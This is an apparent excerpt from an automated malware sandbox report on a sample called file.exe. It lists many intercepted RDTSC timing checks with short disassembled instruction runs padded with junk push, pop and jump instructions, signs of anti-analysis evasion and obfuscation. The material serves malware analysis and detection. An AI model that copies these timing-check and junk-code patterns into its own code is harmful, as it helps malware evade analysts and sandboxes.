Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF4FAF second address: BF4FB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F0B48B8DEE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF4FB9 second address: BF4FBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF3885 second address: BF3889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF3889 second address: BF38A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48765F34h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF38A3 second address: BF38A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF38A9 second address: BF38AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF38AF second address: BF38B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF38B3 second address: BF38B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF6C63 second address: BF6C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF8C33 second address: BF8C3F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0B48765F26h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF8C3F second address: BF8C44 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF8D8D second address: BF8DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B48765F36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF8DA9 second address: BF8DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF8DB2 second address: BF8DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF8DB6 second address: BF8DBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF8DBA second address: BF8DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFB7D3 second address: BFB7D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFB7D7 second address: BFB7FF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0B48765F26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d js 00007F0B48765F46h 0x00000013 pushad 0x00000014 jmp 00007F0B48765F32h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFBA88 second address: BFBABB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48B8DEF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0B48B8DEF4h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C06086 second address: C0608A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0624A second address: C0625A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0B48B8DEE6h 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB28ED second address: BB28F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB28F3 second address: BB2974 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0B48B8DEE8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d add dword ptr [ebp+1247AA73h], edi 0x00000013 mov ebx, dword ptr [ebp+1248593Bh] 0x00000019 mov dx, di 0x0000001c add eax, ebx 0x0000001e push esi 0x0000001f mov edx, dword ptr [ebp+122D2DDCh] 0x00000025 pop edi 0x00000026 push eax 0x00000027 jng 00007F0B48B8DEFCh 0x0000002d push edi 0x0000002e jmp 00007F0B48B8DEF4h 0x00000033 pop edi 0x00000034 mov dword ptr [esp], eax 0x00000037 mov ecx, dword ptr [ebp+122D384Ah] 0x0000003d mov ecx, dword ptr [ebp+122D1B47h] 0x00000043 push 00000004h 0x00000045 call 00007F0B48B8DEF7h 0x0000004a mov ecx, edi 0x0000004c pop ecx 0x0000004d nop 0x0000004e jo 00007F0B48B8DEECh 0x00000054 pushad 0x00000055 pushad 0x00000056 popad 0x00000057 pushad 0x00000058 popad 0x00000059 popad 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB2974 second address: BB297B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB297B second address: BB2980 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0A1B4 second address: C0A1BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B71849 second address: B7184F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C09C88 second address: C09CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0B48765F26h 0x0000000a popad 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f jmp 00007F0B48765F36h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F0B48765F2Fh 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1066A second address: C10670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C10670 second address: C10674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C10674 second address: C1068C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007F0B48B8DEE8h 0x0000000e js 00007F0B48B8DEECh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C11296 second address: C1129A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C114F4 second address: C1151C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B48B8DEF1h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F0B48B8DEEDh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1151C second address: C11535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 pushad 0x0000000a jng 00007F0B48765F26h 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C11535 second address: C11539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C11D5C second address: C11D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C11D62 second address: C11D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C11D66 second address: C11D83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48765F39h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6E292 second address: B6E296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C16E35 second address: C16E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C16E3B second address: C16E3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C16E3F second address: C16E43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C16E43 second address: C16E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C16E49 second address: C16E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F0B48765F33h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C16E65 second address: C16E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 popad 0x0000000a push ecx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C17005 second address: C1700D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C17151 second address: C17158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1728D second address: C17293 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C17293 second address: C172B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 jmp 00007F0B48B8DEF0h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C172B5 second address: C172D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007F0B48765F34h 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C17437 second address: C1743D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1743D second address: C17441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C17441 second address: C1746D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0B48B8DEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jbe 00007F0B48B8DEFAh 0x00000011 push edx 0x00000012 pop edx 0x00000013 jmp 00007F0B48B8DEF2h 0x00000018 pushad 0x00000019 push eax 0x0000001a pop eax 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C175C9 second address: C175CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C175CD second address: C175E1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0B48B8DEE6h 0x00000008 jl 00007F0B48B8DEE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C175E1 second address: C175E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C175E5 second address: C175FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48B8DEF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1F00F second address: C1F032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F0B48765F2Dh 0x0000000b jmp 00007F0B48765F30h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C24C49 second address: C24C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C24C4F second address: C24C57 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C254B0 second address: C254BA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0B48B8DEE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C257A1 second address: C257B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B48765F2Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C24705 second address: C24709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C398B6 second address: C398BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C398BB second address: C3990B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0B48B8DF04h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F0B48B8DEEBh 0x00000010 jnc 00007F0B48B8DEECh 0x00000016 jmp 00007F0B48B8DEECh 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3990B second address: C3990F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C39352 second address: C39360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 jno 00007F0B48B8DEE6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C413F3 second address: C413F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C497C9 second address: C497CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C49631 second address: C4963B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0B48765F26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4963B second address: C4964A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48B8DEEBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5049D second address: C504B1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F0B48765F2Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C50325 second address: C50335 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F0B48B8DEE6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C59DB9 second address: C59DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F0B48765F31h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C59DD2 second address: C59DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0B48B8DEF1h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C587EB second address: C5880A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F0B48765F35h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C58918 second address: C58925 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F0B48B8DEE6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C59024 second address: C59045 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48765F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C59A67 second address: C59A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0B48B8DEE6h 0x0000000a popad 0x0000000b push ecx 0x0000000c jmp 00007F0B48B8DEF5h 0x00000011 pop ecx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C59A89 second address: C59A8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C59A8F second address: C59AA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jno 00007F0B48B8DEE6h 0x0000000f pop edi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C59AA5 second address: C59ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a je 00007F0B48765F26h 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0B48765F34h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5DB36 second address: C5DB45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F0B48B8DEE6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5DB45 second address: C5DB5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48765F33h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D66D second address: C5D671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D671 second address: C5D675 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D675 second address: C5D681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D681 second address: C5D685 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D685 second address: C5D68B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D68B second address: C5D691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D691 second address: C5D69B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0B48B8DEEEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D69B second address: C5D6B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jp 00007F0B48765F26h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D6B2 second address: C5D6B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D6B7 second address: C5D6BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D7FA second address: C5D805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0B48B8DEE6h 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D805 second address: C5D82A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48765F2Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F0B48765F35h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D82A second address: C5D846 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007F0B48B8DEE6h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D846 second address: C5D84A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D84A second address: C5D850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6A747 second address: C6A74B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C67815 second address: C67831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0B48B8DEE6h 0x0000000a popad 0x0000000b jmp 00007F0B48B8DEEEh 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
